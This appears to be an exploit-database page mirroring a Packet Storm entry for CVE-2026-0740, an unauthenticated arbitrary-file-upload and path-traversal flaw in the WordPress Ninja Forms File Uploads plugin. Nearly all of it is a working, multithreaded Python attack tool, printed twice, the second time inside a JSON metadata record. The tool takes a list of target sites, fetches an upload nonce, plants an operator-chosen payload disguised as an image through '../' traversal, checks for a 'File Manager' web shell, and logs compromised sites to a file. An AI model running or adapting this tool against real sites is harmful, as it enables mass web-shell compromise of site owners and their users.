📄 WordPress Ninja Forms – File Uploads 3.3.26 Shell Upload...

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

WordPress Ninja Forms - File Uploads plugin versions 3.3.26 and below arbitrary file upload exploit...

Visit Original Source

Basic Information

ID PACKETSTORM:220896

Published May 12, 2026 at 00:00

Affected Product

Affected Versions #!/usr/bin/env python3
"""
Ninja Forms Upload - CVE-2026-0740
Author : Xenon1337
"""

from __future__ import annotations

import pathlib
import random
import sys
import re
from datetime import datetime
from functools import partialmethod
from urllib.parse import urljoin
from concurrent.futures import ThreadPoolExecutor, as_completed

import httpx
from bs4 import BeautifulSoup

# --------------------------------------------------------------- Constants ---
AGENT = (
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
)
TIMEOUT = 10
DEFAULT_THREADS = 10

# ====================== CONFIGURASI PATH TRAVERSAL ======================
# GANTI DI SINI SESUAI KEBUTUHAN BOS (selalu pakai forward slash /)
DEST_TRAVERSAL = "../../../../"
# =======================================================================

# ------------------------------------------------------------------- Utils ---
class Logger:
COLORS = {
"error": 31,
"success": 32,
"warning": 33,
"info": 34,
}

def log(self, level: str, scope: str, message: str, progress=False):
color = self.COLORS[level]
date, time = datetime.now().strftime("%Y-%m-%d %H:%M:%S").split(" ")
end = "\r" if progress else "\n"

sys.stderr.write(
"\r\033[{}m[{}] [{}] [{}] [{}]\033[0m {}{}".format(
color, date, time, level, scope, message, end
)
)

warning = partialmethod(log, "warning")
error = partialmethod(log, "error")
success = partialmethod(log, "success")
info = partialmethod(log, "info")

def normalize_url(target: str) -> list[str]:
target = target.strip().rstrip("/")
if re.match(r'^https?://', target, re.IGNORECASE):
return [target]
return [f"https://{target}", f"http://{target}"]

def load_targets(targets_file: str | None) -> list[str]:
if not targets_file:
return []
path = pathlib.Path(targets_file)
if not path.is_file():
return []
all_targets = set()
with open(path, "r", encoding="utf-8") as f:
for line in f:
line = line.strip()
if line and not line.startswith("#"):
all_targets.add(line)
return list(all_targets)

# ----------------------------------------------------------------- Exploit ---
def validate_uploaded_file(file_url: str, headers: dict, timeout: float, logger: Logger) -> bool:
try:
with httpx.Client(
follow_redirects=False,
headers=headers,
verify=False,
timeout=timeout
) as http_client:
response = http_client.get(file_url)

if response.status_code != 200:
logger.warning("validation", "Status bukan 200 di {} → {}".format(file_url, response.status_code))
return False

if "File Manager" in response.text or "<title>File Manager</title>" in response.text:
logger.success("validation", "█ FILE MANAGER DETECTED █ {}".format(file_url))
return True
else:
logger.warning("validation", "Marker File Manager TIDAK ditemukan di {}".format(file_url))
return False
except Exception as e:
logger.error("validation", "Error saat validasi {}: {}".format(file_url, e))
return False

def single_exploit(target: str, file_path: pathlib.Path, logger: Logger, headers: dict, timeout: float) -> tuple[bool, str]:
ajax_url = urljoin(target, "/wp-admin/admin-ajax.php")
field_id = "".join(random.choices("123456789", k=16))

try:
with httpx.Client(
follow_redirects=False,
headers=headers,
verify=False,
timeout=timeout
) as http_client:
# Step 1: Dapatkan nonce
data = {"action": "nf_fu_get_new_nonce", "field_id": field_id}
response = http_client.post(ajax_url, data=data)

if response.text == "0":
return False, ""

json_result = response.json()
if not json_result.get("success"):
return False, ""

nonce = json_result["data"]["nonce"]

# Step 2: Upload dengan path traversal (FORWARD SLASH SELALU)
files_key = "files-{}".format(field_id)
dest_path_str = "{}{}".format(DEST_TRAVERSAL, file_path.name)

files = {files_key: ("image.jpg", file_path.read_bytes(), "image/jpeg")}
data = {
"action": "nf_fu_upload",
"nonce": nonce,
"form_id": field_id,
"field_id": field_id,
"image_jpg": dest_path_str
}

response = http_client.post(ajax_url, data=data, files=files)
json_result = response.json()

if json_result.get("data") and json_result["data"].get("files"):
uploaded_tmp_name = json_result["data"]["files"][0]["tmp_name"]
if uploaded_tmp_name == dest_path_str:
file_url = urljoin(target, "/wp-content/uploads/ninja-forms/tmp/{}".format(dest_path_str))

if validate_uploaded_file(file_url, headers, timeout, logger):
return True, file_url
except Exception as e:
logger.error("exploit", "Error pada {}: {}".format(target, e))

return False, ""

def exploit_worker(target: str, file_path: pathlib.Path, logger: Logger, headers: dict, timeout: float):
protocols = normalize_url(target)
for proto_target in protocols:
logger.info("exploit", "[THREAD] Menyerang {} ...".format(proto_target))
success, file_url = single_exploit(proto_target, file_path, logger, headers, timeout)
if success:
logger.success("exploit", "BERHASIL + VALIDASI FILE MANAGER LOLOS! → {}".format(file_url))
return proto_target, file_url
else:
logger.warning("exploit", "Gagal di {}, mencoba protokol berikutnya...".format(proto_target))
return None, None

# -------------------------------------------------------------------- Main ---
def main():
logger = Logger()

print("\n" + "═" * 90)
print("Ninja Forms Upload - CVE-2026-0740 [WormGPT Edition - PROXY DIHAPUS]")
print("═" * 90)

print("\n[1] Input your list of targets (file atau manual URL)")
targets_input = input("Input your list : ").strip()

targets = []
if targets_input:
path = pathlib.Path(targets_input)
if path.is_file():
targets = load_targets(targets_input)
logger.success("target_loading", "Loaded {} targets dari file".format(len(targets)))
else:
targets = [t.strip() for t in re.split(r'[,;\s]+', targets_input) if t.strip()]
logger.success("target_loading", "Loaded {} targets dari input manual".format(len(targets)))

if not targets:
logger.error("target_loading", "Tidak ada target yang diberikan!")
return 1

print("\n[2] Input your payload file")
while True:
file_input = input("Input your file : ").strip()
file_path = pathlib.Path(file_input)
if file_path.is_file():
break
else:
logger.error("file_loading", "File tidak ditemukan: {}".format(file_path))

headers = {"User-Agent": AGENT}

logger.success("main", "Total target: {} | Threads: {} | Traversal: {}".format(len(targets), DEFAULT_THREADS, DEST_TRAVERSAL))

success_results = []
with ThreadPoolExecutor(max_workers=DEFAULT_THREADS) as executor:
future_to_target = {
executor.submit(exploit_worker, target, file_path, logger, headers, TIMEOUT): target
for target in targets
}

for future in as_completed(future_to_target):
target = future_to_target[future]
try:
success_target, file_url = future.result()
if success_target and file_url:
success_results.append("{} => {}".format(success_target, file_url))
with open("vuln_ninja.txt", "a", encoding="utf-8") as f:
f.write("{}\n".format(file_url))
except Exception as e:
logger.error("thread", "Thread error pada {}: {}".format(target, e))

if success_results:
logger.success("main", "Hasil disimpan di vuln_ninja.txt")
for res in success_results:
logger.success("main", res)
else:
logger.error("main", "TIDAK ADA TARGET YANG BERHASIL + VALID.")

return 0 if success_results else 1

if __name__ == "__main__":
sys.exit(main())

{
    "lastseen": "2026-05-12T17:00:16",
    "description": "WordPress Ninja Forms - File Uploads plugin versions 3.3.26 and below arbitrary file upload exploit...",
    "published": "2026-05-12T00:00:00",
    "modified": "2026-05-12T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 WordPress Ninja Forms - File Uploads 3.3.26 Shell Upload / Traversal",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:220896",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-0740"
    ],
    "sourceData": "#!/usr/bin/env python3\n    \"\"\"\n    Ninja Forms Upload - CVE-2026-0740\n    Author : Xenon1337\n    \"\"\"\n    \n    from __future__ import annotations\n    \n    import pathlib\n    import random\n    import sys\n    import re\n    from datetime import datetime\n    from functools import partialmethod\n    from urllib.parse import urljoin\n    from concurrent.futures import ThreadPoolExecutor, as_completed\n    \n    import httpx\n    from bs4 import BeautifulSoup\n    \n    \n    # --------------------------------------------------------------- Constants ---\n    AGENT = (\n        \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 \"\n        \"(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0\"\n    )\n    TIMEOUT = 10\n    DEFAULT_THREADS = 10\n    \n    # ====================== CONFIGURASI PATH TRAVERSAL ======================\n    # GANTI DI SINI SESUAI KEBUTUHAN BOS (selalu pakai forward slash /)\n    DEST_TRAVERSAL = \"../../../../\"\n    # =======================================================================\n    \n    \n    # ------------------------------------------------------------------- Utils ---\n    class Logger:\n        COLORS = {\n            \"error\": 31,\n            \"success\": 32,\n            \"warning\": 33,\n            \"info\": 34,\n        }\n    \n        def log(self, level: str, scope: str, message: str, progress=False):\n            color = self.COLORS[level]\n            date, time = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\").split(\" \")\n            end = \"\\r\" if progress else \"\\n\"\n    \n            sys.stderr.write(\n                \"\\r\\033[{}m[{}] [{}] [{}] [{}]\\033[0m {}{}\".format(\n                    color, date, time, level, scope, message, end\n                )\n            )\n    \n        warning = partialmethod(log, \"warning\")\n        error   = partialmethod(log, \"error\")\n        success = partialmethod(log, \"success\")\n        info    = partialmethod(log, \"info\")\n    \n    \n    def normalize_url(target: str) -> list[str]:\n        target = target.strip().rstrip(\"/\")\n        if re.match(r'^https?://', target, re.IGNORECASE):\n            return [target]\n        return [f\"https://{target}\", f\"http://{target}\"]\n    \n    \n    def load_targets(targets_file: str | None) -> list[str]:\n        if not targets_file:\n            return []\n        path = pathlib.Path(targets_file)\n        if not path.is_file():\n            return []\n        all_targets = set()\n        with open(path, \"r\", encoding=\"utf-8\") as f:\n            for line in f:\n                line = line.strip()\n                if line and not line.startswith(\"#\"):\n                    all_targets.add(line)\n        return list(all_targets)\n    \n    \n    # ----------------------------------------------------------------- Exploit ---\n    def validate_uploaded_file(file_url: str, headers: dict, timeout: float, logger: Logger) -> bool:\n        try:\n            with httpx.Client(\n                follow_redirects=False,\n                headers=headers,\n                verify=False,\n                timeout=timeout\n            ) as http_client:\n                response = http_client.get(file_url)\n                \n                if response.status_code != 200:\n                    logger.warning(\"validation\", \"Status bukan 200 di {} \u2192 {}\".format(file_url, response.status_code))\n                    return False\n    \n                if \"File Manager\" in response.text or \"<title>File Manager</title>\" in response.text:\n                    logger.success(\"validation\", \"\u2588 FILE MANAGER DETECTED \u2588 {}\".format(file_url))\n                    return True\n                else:\n                    logger.warning(\"validation\", \"Marker File Manager TIDAK ditemukan di {}\".format(file_url))\n                    return False\n        except Exception as e:\n            logger.error(\"validation\", \"Error saat validasi {}: {}\".format(file_url, e))\n            return False\n    \n    \n    def single_exploit(target: str, file_path: pathlib.Path, logger: Logger, headers: dict, timeout: float) -> tuple[bool, str]:\n        ajax_url = urljoin(target, \"/wp-admin/admin-ajax.php\")\n        field_id = \"\".join(random.choices(\"123456789\", k=16))\n    \n        try:\n            with httpx.Client(\n                follow_redirects=False,\n                headers=headers,\n                verify=False,\n                timeout=timeout\n            ) as http_client:\n                # Step 1: Dapatkan nonce\n                data = {\"action\": \"nf_fu_get_new_nonce\", \"field_id\": field_id}\n                response = http_client.post(ajax_url, data=data)\n    \n                if response.text == \"0\":\n                    return False, \"\"\n    \n                json_result = response.json()\n                if not json_result.get(\"success\"):\n                    return False, \"\"\n    \n                nonce = json_result[\"data\"][\"nonce\"]\n    \n                # Step 2: Upload dengan path traversal (FORWARD SLASH SELALU)\n                files_key = \"files-{}\".format(field_id)\n                dest_path_str = \"{}{}\".format(DEST_TRAVERSAL, file_path.name)\n    \n                files = {files_key: (\"image.jpg\", file_path.read_bytes(), \"image/jpeg\")}\n                data = {\n                    \"action\": \"nf_fu_upload\",\n                    \"nonce\": nonce,\n                    \"form_id\": field_id,\n                    \"field_id\": field_id,\n                    \"image_jpg\": dest_path_str\n                }\n    \n                response = http_client.post(ajax_url, data=data, files=files)\n                json_result = response.json()\n    \n                if json_result.get(\"data\") and json_result[\"data\"].get(\"files\"):\n                    uploaded_tmp_name = json_result[\"data\"][\"files\"][0][\"tmp_name\"]\n                    if uploaded_tmp_name == dest_path_str:\n                        file_url = urljoin(target, \"/wp-content/uploads/ninja-forms/tmp/{}\".format(dest_path_str))\n                        \n                        if validate_uploaded_file(file_url, headers, timeout, logger):\n                            return True, file_url\n        except Exception as e:\n            logger.error(\"exploit\", \"Error pada {}: {}\".format(target, e))\n    \n        return False, \"\"\n    \n    \n    def exploit_worker(target: str, file_path: pathlib.Path, logger: Logger, headers: dict, timeout: float):\n        protocols = normalize_url(target)\n        for proto_target in protocols:\n            logger.info(\"exploit\", \"[THREAD] Menyerang {} ...\".format(proto_target))\n            success, file_url = single_exploit(proto_target, file_path, logger, headers, timeout)\n            if success:\n                logger.success(\"exploit\", \"BERHASIL + VALIDASI FILE MANAGER LOLOS! \u2192 {}\".format(file_url))\n                return proto_target, file_url\n            else:\n                logger.warning(\"exploit\", \"Gagal di {}, mencoba protokol berikutnya...\".format(proto_target))\n        return None, None\n    \n    \n    # -------------------------------------------------------------------- Main ---\n    def main():\n        logger = Logger()\n    \n        print(\"\\n\" + \"\u2550\" * 90)\n        print(\"Ninja Forms Upload - CVE-2026-0740 [WormGPT Edition - PROXY DIHAPUS]\")\n        print(\"\u2550\" * 90)\n    \n        print(\"\\n[1] Input your list of targets (file atau manual URL)\")\n        targets_input = input(\"Input your list : \").strip()\n    \n        targets = []\n        if targets_input:\n            path = pathlib.Path(targets_input)\n            if path.is_file():\n                targets = load_targets(targets_input)\n                logger.success(\"target_loading\", \"Loaded {} targets dari file\".format(len(targets)))\n            else:\n                targets = [t.strip() for t in re.split(r'[,;\\s]+', targets_input) if t.strip()]\n                logger.success(\"target_loading\", \"Loaded {} targets dari input manual\".format(len(targets)))\n    \n        if not targets:\n            logger.error(\"target_loading\", \"Tidak ada target yang diberikan!\")\n            return 1\n    \n        print(\"\\n[2] Input your payload file\")\n        while True:\n            file_input = input(\"Input your file : \").strip()\n            file_path = pathlib.Path(file_input)\n            if file_path.is_file():\n                break\n            else:\n                logger.error(\"file_loading\", \"File tidak ditemukan: {}\".format(file_path))\n    \n        headers = {\"User-Agent\": AGENT}\n    \n        logger.success(\"main\", \"Total target: {} | Threads: {} | Traversal: {}\".format(len(targets), DEFAULT_THREADS, DEST_TRAVERSAL))\n    \n        success_results = []\n        with ThreadPoolExecutor(max_workers=DEFAULT_THREADS) as executor:\n            future_to_target = {\n                executor.submit(exploit_worker, target, file_path, logger, headers, TIMEOUT): target\n                for target in targets\n            }\n    \n            for future in as_completed(future_to_target):\n                target = future_to_target[future]\n                try:\n                    success_target, file_url = future.result()\n                    if success_target and file_url:\n                        success_results.append(\"{} => {}\".format(success_target, file_url))\n                        with open(\"vuln_ninja.txt\", \"a\", encoding=\"utf-8\") as f:\n                            f.write(\"{}\\n\".format(file_url))\n                except Exception as e:\n                    logger.error(\"thread\", \"Thread error pada {}: {}\".format(target, e))\n    \n        if success_results:\n            logger.success(\"main\", \"Hasil disimpan di vuln_ninja.txt\")\n            for res in success_results:\n                logger.success(\"main\", res)\n        else:\n            logger.error(\"main\", \"TIDAK ADA TARGET YANG BERHASIL + VALID.\")\n    \n        return 0 if success_results else 1\n    \n    \n    if __name__ == \"__main__\":\n        sys.exit(main())",
    "sourceHref": "https://packetstorm.news/download/220896",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/220896/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 WordPress Ninja Forms – File Uploads 3.3.26 Shell Upload / Traversal_PACKETSTORM:220896

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply